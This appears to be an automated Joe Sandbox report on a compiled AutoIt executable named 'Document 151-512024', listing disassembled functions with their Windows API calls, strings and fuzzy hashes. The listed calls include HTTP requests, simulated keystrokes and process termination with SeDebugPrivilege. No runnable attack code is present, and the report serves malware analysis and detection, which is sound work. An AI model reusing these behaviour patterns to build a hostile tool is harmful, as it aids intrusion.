Part of subcall function 00945D0A: GetClientRect.USER32(?,?), ref: 00945D30
Part of subcall function 00945D0A: GetWindowRect.USER32(?,?), ref: 00945D71
Part of subcall function 00945D0A: ScreenToClient.USER32(?,?), ref: 00945D99

GetDC.USER32 ref: 009846F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00984708
SelectObject.GDI32(00000000,00000000), ref: 00984716
SelectObject.GDI32(00000000,00000000), ref: 0098472B
ReleaseDC.USER32(?,00000000), ref: 00984733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009847C4

Strings

U, xrefs: 00984693

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 9852954c590ac9eff9c34b1b5d82fc5c9f0a6a8a9b91ef48486c6337597bf2e9
Instruction ID: e0cf1af8588ea3ac243748a80a167270c0cd044dd7e4422745e9eaaca4e68ca5
Opcode Fuzzy Hash: 9852954c590ac9eff9c34b1b5d82fc5c9f0a6a8a9b91ef48486c6337597bf2e9
Instruction Fuzzy Hash: 2171E031400206DFCF21EFA4C984EBA7BB9FF4A325F14426AED565A2A6D3358C81DF50

Function 009B359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 009B35E4

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

LoadStringW.USER32(00A12390,?,00000FFF,?), ref: 009B360A

Strings

"%s" (%d) : ==> %s:, xrefs: 009B3742
"%s" (%d) : ==> %s:%s%s, xrefs: 009B3724
^ ERROR, xrefs: 009B36C9
Line %d (File "%s"):, xrefs: 009B366B
Error: , xrefs: 009B36EF

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 1fa409c933e0bbfc1cc993253632ffa807806f2e34a107b83b76eb06931d266b
Instruction ID: a57f723a0c72d1e4ee7ae2c4ee0479f902ae6233352f4c66c330860be838b504
Opcode Fuzzy Hash: 1fa409c933e0bbfc1cc993253632ffa807806f2e34a107b83b76eb06931d266b
Instruction Fuzzy Hash: 1F516E72840209BADF14EBA0DD86FEEBB78EF44314F048125F505721A2DB311A99DBA1

Function 009D2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009D2E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 009D2E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 009D2E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009D2EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009D2EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 009D2EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009D2F0B

Strings

0n, xrefs: 009D2E00, 009D2E34, 009D2E69, 009D2EA1, 009D2EC5, 009D2EFD

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: 0n
API String ID: 2178440468-3368625520
Opcode ID: 6d3d4cd9e6ee1d7d88081023b43db89ee1f59cc4c9b5ad956d186d97f6f523df
Instruction ID: 0df45b9a5773e036b4c0b0b0c44eb9254221eff14d747241a1628d857fa3196e
Opcode Fuzzy Hash: 6d3d4cd9e6ee1d7d88081023b43db89ee1f59cc4c9b5ad956d186d97f6f523df
Instruction Fuzzy Hash: 4E3115306891419FDB21CF58DC84FA537E8EBAA750F1481A6FA108F3B1CB71E880DB20

Function 009BC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009BC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009BC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009BC2CA
GetLastError.KERNEL32 ref: 009BC322
SetEvent.KERNEL32(?), ref: 009BC336
InternetCloseHandle.WININET(00000000), ref: 009BC341

Strings

, xrefs: 009BC2BB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: faca89219c9b339e1e2a6fde6be563d4b312d6098a18f8d37f28d0647c427837
Instruction ID: 3bf9363e1651f545a44e362116f8f227d69a1b2a620b2b45c6cf372af0b0be89
Opcode Fuzzy Hash: faca89219c9b339e1e2a6fde6be563d4b312d6098a18f8d37f28d0647c427837
Instruction Fuzzy Hash: B831AEF1605209AFD7219FA48E88AEB7BFCEB89760F54851EF486D2200DB34DD44DB60

Function 009A989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00983AAF,?,?,Bad directive syntax error,009DCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 009A98BC
LoadStringW.USER32(00000000,?,00983AAF,?), ref: 009A98C3

Part of subcall function 00949CB3: _wcslen.LIBCMT ref: 00949CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009A9987

Strings

Line %d:, xrefs: 009A9912
., xrefs: 009A996D
Line %d (File "%s"):, xrefs: 009A992D
%s (%d) : ==> %s.: %s %s, xrefs: 009A98F1
Error: , xrefs: 009A9955

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 0adcc12194a1380656551926150a7bb088838cf368ff01004501e1a18944e613
Instruction ID: 142f6dc4be734a05c5b944806346b1d9cb49b089bf623ac8b1527cf678b50f6c
Opcode Fuzzy Hash: 0adcc12194a1380656551926150a7bb088838cf368ff01004501e1a18944e613
Instruction Fuzzy Hash: AE216D3284021EBBDF15AFA0DC1AFEE7779BF58304F04481AF515660A2EB319668DB51

Function 009A209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009A20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 009A20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009A214D

Strings

list, xrefs: 009A212F
details, xrefs: 009A20FB
smallicons, xrefs: 009A2115
SHELLDLL_DefView, xrefs: 009A20CC
largeicons, xrefs: 009A20E1

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 054efb47e95b83804db534312ce038d798fd401ffaa8e7ec16e0f80622cb942a
Instruction ID: a9d39361b568806bcc5a75c8d818d425a66c1d7510c1beed37ab32fac5fd2542
Opcode Fuzzy Hash: 054efb47e95b83804db534312ce038d798fd401ffaa8e7ec16e0f80622cb942a
Instruction Fuzzy Hash: 5311C6B6ACC70BB9FA056778EC06EA7379CDF07724F200516FB04A50D1FE65A8426A94

Function 0097CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0097CEB7
_free.LIBCMT ref: 0097CF22
_free.LIBCMT ref: 0097CF48
_free.LIBCMT ref: 0097CF71
_free.LIBCMT ref: 0097CFA9
_free.LIBCMT ref: 0097CFDA
_free.LIBCMT ref: 0097D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0097D09C
_free.LIBCMT ref: 0097D0B5

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 962f1ab80c2702983b4902486f32b7e41120261ceea1c86ace950f7a351a7107
Instruction ID: d80c74c27aeab15dabd4c393a12e6b56c1f93b6b4c083b3f1536b962e3640c49
Opcode Fuzzy Hash: 962f1ab80c2702983b4902486f32b7e41120261ceea1c86ace950f7a351a7107
Instruction Fuzzy Hash: D5613BB3A05311AFDB21AFB4AC91BAE7BA9EF45320F04C16EF94CA7281D7319D418750

Function 00958B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00996890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009968A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009968B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009968D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009968F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00958874,00000000,00000000,00000000,000000FF,00000000), ref: 00996901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0099691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00958874,00000000,00000000,00000000,000000FF,00000000), ref: 0099692D

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 30f5fdf5fd95662441ddcd02c330f6c3c546a338deb7f1001f75c5def69c50b7
Instruction ID: b83f7b9c3b8ebdb4e796cbf4b6ad824973fa8acb3ec29396fe6aa9205c3904e6
Opcode Fuzzy Hash: 30f5fdf5fd95662441ddcd02c330f6c3c546a338deb7f1001f75c5def69c50b7
Instruction Fuzzy Hash: FB519DB0600205EFDF20CF2ACC55FAA7BB9FB88761F104519F952A72A0DB70E995DB50

Function 009BC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009BC182
GetLastError.KERNEL32 ref: 009BC195
SetEvent.KERNEL32(?), ref: 009BC1A9

Part of subcall function 009BC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009BC272
Part of subcall function 009BC253: GetLastError.KERNEL32 ref: 009BC322
Part of subcall function 009BC253: SetEvent.KERNEL32(?), ref: 009BC336
Part of subcall function 009BC253: InternetCloseHandle.WININET(00000000), ref: 009BC341

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 1978c44bb60590a715c538fc7d7ee474218eef78f2f201556cf09d8588ebb338
Instruction ID: 0b7626ffd35bf3e6c8cf874e2d40bdf469e7209cf04f5b11452e45923655a3f1
Opcode Fuzzy Hash: 1978c44bb60590a715c538fc7d7ee474218eef78f2f201556cf09d8588ebb338
Instruction Fuzzy Hash: 6931A0B1245606BFDB219FA5DE04AA6BBFDFF58320B00441EF966C6610C730E850EBA0

Function 009A25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 009A3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009A3A57
Part of subcall function 009A3A3D: GetCurrentThreadId.KERNEL32 ref: 009A3A5E
Part of subcall function 009A3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009A25B3), ref: 009A3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 009A25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009A25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009A25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 009A25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009A2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009A2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 009A260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009A2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009A2627

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 5199a52b1d589be2149205d2f235447efddc3c168f2aca124ea86690cd9dbe28
Instruction ID: 02de8259b9f2e1f1ce8e78a0b3c02bb077ee8ea69fa32b297c9fb3d03d98730a
Opcode Fuzzy Hash: 5199a52b1d589be2149205d2f235447efddc3c168f2aca124ea86690cd9dbe28
Instruction Fuzzy Hash: 4501D8707D8321BBFB106B689C8AF593F59DB8EB11F500002F314AF0D1C9E15484DAA9

Function 009A1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,009A1449,?,?,00000000), ref: 009A180C
HeapAlloc.KERNEL32(00000000,?,009A1449,?,?,00000000), ref: 009A1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009A1449,?,?,00000000), ref: 009A1828
GetCurrentProcess.KERNEL32(?,00000000,?,009A1449,?,?,00000000), ref: 009A1830
DuplicateHandle.KERNEL32(00000000,?,009A1449,?,?,00000000), ref: 009A1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,009A1449,?,?,00000000), ref: 009A1843
GetCurrentProcess.KERNEL32(009A1449,00000000,?,009A1449,?,?,00000000), ref: 009A184B
DuplicateHandle.KERNEL32(00000000,?,009A1449,?,?,00000000), ref: 009A184E
CreateThread.KERNEL32(00000000,00000000,009A1874,00000000,00000000,00000000), ref: 009A1868

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 2283ad668598682ca35b9793f9479d5e579f68f402e4ce16d57668a3736b3bf3
Instruction ID: 857094701d6eb04a1ec85eb02285729e154251f40d40a6996eb480a5b63fef31
Opcode Fuzzy Hash: 2283ad668598682ca35b9793f9479d5e579f68f402e4ce16d57668a3736b3bf3
Instruction Fuzzy Hash: 6901FBB5295319BFE710ABA5DC4DF6B3BACEB89B40F004411FA04DB1A1CA709840DB20

Function 009AC5D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00947620: _wcslen.LIBCMT ref: 00947625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009AC6EE
_wcslen.LIBCMT ref: 009AC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009AC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009AC7CA

Strings

0, xrefs: 009AC6AF
Pl, xrefs: 009AC64B
Pl, xrefs: 009AC652

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0$Pl$Pl
API String ID: 1227352736-2856975402
Opcode ID: 2f794baf61947f2373722aca0e90ef91d7db43222a2ba69f1a2eeb33073160e5
Instruction ID: 9fe1357a0db60b11c5e7b735980834da97ee670b17b7d6cd0504f5cd15e094de
Opcode Fuzzy Hash: 2f794baf61947f2373722aca0e90ef91d7db43222a2ba69f1a2eeb33073160e5
Instruction Fuzzy Hash: F451B0B16083019BD715DF28C885BAB77E8EF8A314F040A29F995EB291DB64D944CFD2

Function 009CA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 009AD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 009AD501
Part of subcall function 009AD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 009AD50F
Part of subcall function 009AD4DC: CloseHandle.KERNEL32(00000000), ref: 009AD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 009CA16D
GetLastError.KERNEL32 ref: 009CA180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 009CA1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 009CA268
GetLastError.KERNEL32(00000000), ref: 009CA273
CloseHandle.KERNEL32(00000000), ref: 009CA2C4

Strings

SeDebugPrivilege, xrefs: 009CA18F

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 4ac7fb19466b1c299c452cb31406536156a4c2fc8347b853b98f810541470c7b
Instruction ID: 6f16c3e6a8687418cc736952760475dd295aca9fec9a4bbeeb3a630a8ec83d59
Opcode Fuzzy Hash: 4ac7fb19466b1c299c452cb31406536156a4c2fc8347b853b98f810541470c7b
Instruction Fuzzy Hash: A06190706092529FD720DF14C494F19BBE5AF8431CF18849CE4668B7A3C776ED49CB92

Function 009D3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 009D3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 009D393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 009D3954
_wcslen.LIBCMT ref: 009D3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 009D39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009D39F4

Strings

SysListView32, xrefs: 009D38F7

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: de507b20cc5d92adc06bf690d400952004cb29ee184a926ca028012e92626b00
Instruction ID: f0ee36cc14b6a87a787a22bbbb34ddaf620bc01b7d72303e5db88edcbac82bdb
Opcode Fuzzy Hash: de507b20cc5d92adc06bf690d400952004cb29ee184a926ca028012e92626b00
Instruction Fuzzy Hash: 2D41C271A40219ABEF219F64CC45FEA7BA9EF48350F108527F948E7281D771DA80CB90

Function 009D81DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0099F3AB,00000000,?,?,00000000,?,0099682C,00000004,00000000,00000000), ref: 009D824C
EnableWindow.USER32(00000000,00000000), ref: 009D8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009D82D1
ShowWindow.USER32(00000000,00000004), ref: 009D82E5
EnableWindow.USER32(00000000,00000001), ref: 009D830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009D832F

Strings

0n, xrefs: 009D8206, 009D8252, 009D8299, 009D82D7, 009D82EB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID: 0n
API String ID: 642888154-3368625520
Opcode ID: 199c587314361ac42c1d48c48caacebf64573a423262aee2cfb08a0348f05b4e
Instruction ID: 1a3d83288db7231f122ed3c0320bda40c787da7ed48293555b56da4f664b5eb1
Opcode Fuzzy Hash: 199c587314361ac42c1d48c48caacebf64573a423262aee2cfb08a0348f05b4e
